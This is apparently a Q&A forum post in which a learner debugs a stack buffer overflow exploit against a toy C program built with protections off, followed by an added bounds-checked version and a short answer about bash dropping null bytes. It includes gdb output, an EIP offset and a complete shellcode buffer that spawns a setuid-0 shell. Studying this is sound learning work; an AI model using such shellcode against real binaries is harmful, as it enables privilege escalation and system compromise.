
Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-1kali1 (2020-05-25) x86_64 GNU/Linux

I'm learning how to exploit buffer overflow vulnerabilities, so I'm pretty bad at this; it may be a simple question, but I couldn't find any useful resources online.

I'm trying to exploit a simple program with a buffer overflow vulnerability. The program's source code is:

#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[]){
        char buffer[64];           /* fixed-size stack buffer */

        if (argc < 2){
                printf("Error - Increase input!");
                return 1;
        }
        strcpy(buffer, argv[1]);   /* unbounded copy: argv[1] longer than 63 bytes overflows buffer */
        return 0;
}

The vulnerable function is strcpy.

I compile it with:

gcc buf.c -o buf -fno-stack-protector -m32 -no-pie -z execstack -g

Finding the offset

So the first step I usually take is to build a buffer to find the correct offset for writing into EIP.

kali@kali:~/Downloads/temp$ msf-pattern_create -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Using gdb (with peda installed), I run the program and check the registers:

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x33634132 ('2Ac3')
ECX: 0x63413163 ('c1Ac')
EDX: 0xffffd224 --> 0xffffd200 ("c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A")
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x41346341 ('Ac4A')
ESP: 0x6341315f ('_1Ac')
EIP: 0x80491d8 (<main+102>:     ret)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d3 <main+97>: pop    ebx
   0x80491d4 <main+98>: pop    ebp
   0x80491d5 <main+99>: lea    esp,[ecx-0x4]
=> 0x80491d8 <main+102>:        ret    
   0x80491d9 <__x86.get_pc_thunk.ax>:   mov    eax,DWORD PTR [esp]
   0x80491dc <__x86.get_pc_thunk.ax+3>: ret    
   0x80491dd <__x86.get_pc_thunk.ax+4>: xchg   ax,ax
   0x80491df <__x86.get_pc_thunk.ax+6>: nop
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x6341315f
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080491d8 in main (argc=<error reading variable: Cannot access memory at address 0x63413163>, argv=<error reading variable: Cannot access memory at address 0x63413167>) at buf.c:13
13      }

As you can see above, I can't see what's in EIP, which I need in order to use msf-pattern_offset to check what the offset to EIP is.

Other tests

Later I tried other offsets, and I noticed that if the buffer is exactly 64, the output is:

gdb-peda$ run $(python -c 'print "A"*64')

##OUTPUT##
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('A' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('A' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('A' <repeats 48 times>)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('A' <repeats 48 times>)
0004| 0xffffd204 ('A' <repeats 44 times>)
0008| 0xffffd208 ('A' <repeats 40 times>)
0012| 0xffffd20c ('A' <repeats 36 times>)
0016| 0xffffd210 ('A' <repeats 32 times>)
0020| 0xffffd214 ('A' <repeats 28 times>)
0024| 0xffffd218 ('A' <repeats 24 times>)
0028| 0xffffd21c ('A' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

Investigating this, I found that EIP comes exactly after 12 characters:

gdb-peda$ run $(python -c 'print "A"*12 + "B"*4 + "C"*48')

#OUTPUT#
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('C' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('C' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('C' <repeats 48 times>)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('C' <repeats 48 times>)
0004| 0xffffd204 ('C' <repeats 44 times>)
0008| 0xffffd208 ('C' <repeats 40 times>)
0012| 0xffffd20c ('C' <repeats 36 times>)
0016| 0xffffd210 ('C' <repeats 32 times>)
0020| 0xffffd214 ('C' <repeats 28 times>)
0024| 0xffffd218 ('C' <repeats 24 times>)
0028| 0xffffd21c ('C' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

Using a 32-bit payload that spawns a shell, my idea was to develop an exploit that passes the following buffer to the program:

python -c 'print "\x90"*12 + "\x00\xd2\xff\xff" + "\x90"*12 + "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" + "\x90"*4'

I get this output:

bash: warning: command substitution: ignored null byte in input
[Inferior 1 (process 5292) exited normally]
Warning: not running

So I think I'm close, but I can't figure out how to make it work.

Sorry for the length of the question.

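For contrast with the program in the question, here is an added example (not code from the question or the answer) of the same program with the copy bounded: the argument is measured against the buffer before anything is written, and an over-long argument is rejected instead of overflowing the stack. The helper name copy_arg is my own.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hardened counterpart of the question's strcpy(buffer, argv[1]).
 * Copies src into dst only if it fits together with the terminating NUL.
 * Returns 0 on success and -1 if src is too long; on failure dst is left
 * as an empty string rather than being partially or fully overflowed. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;

    /* Bounded length scan: never look further than dst_size bytes into src. */
    while (len < dst_size && src[len] != '\0')
        len++;

    if (len >= dst_size) {          /* no room for the NUL terminator: reject */
        if (dst_size > 0)
            dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);      /* bounded copy, including the NUL */
    return 0;
}

/* Same shape as the original main(): one 64-byte stack buffer, one argument. */
int main(int argc, char *argv[])
{
    char buffer[64];

    if (argc < 2) {
        printf("Error - Increase input!\n");
        return 1;
    }
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "Error - argument longer than %zu bytes\n",
                sizeof buffer - 1);
        return 1;
    }
    printf("Copied %zu bytes\n", strlen(buffer));
    return 0;
}
```

Compiled without the -fno-stack-protector, -z execstack and -no-pie flags from the question, the Debian/Kali gcc defaults (stack canary, non-executable stack, PIE) each add a further layer even where a bounds check is missing.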

1 Answer


bash: warning: command substitution: ignored null byte in input

bash uses C strings internally, so a null byte (\0) means end-of-string to it. Try using zsh instead (i.e. run zsh, then run the command as you wrote it).

Answered 2020-06-22T16:50:51.180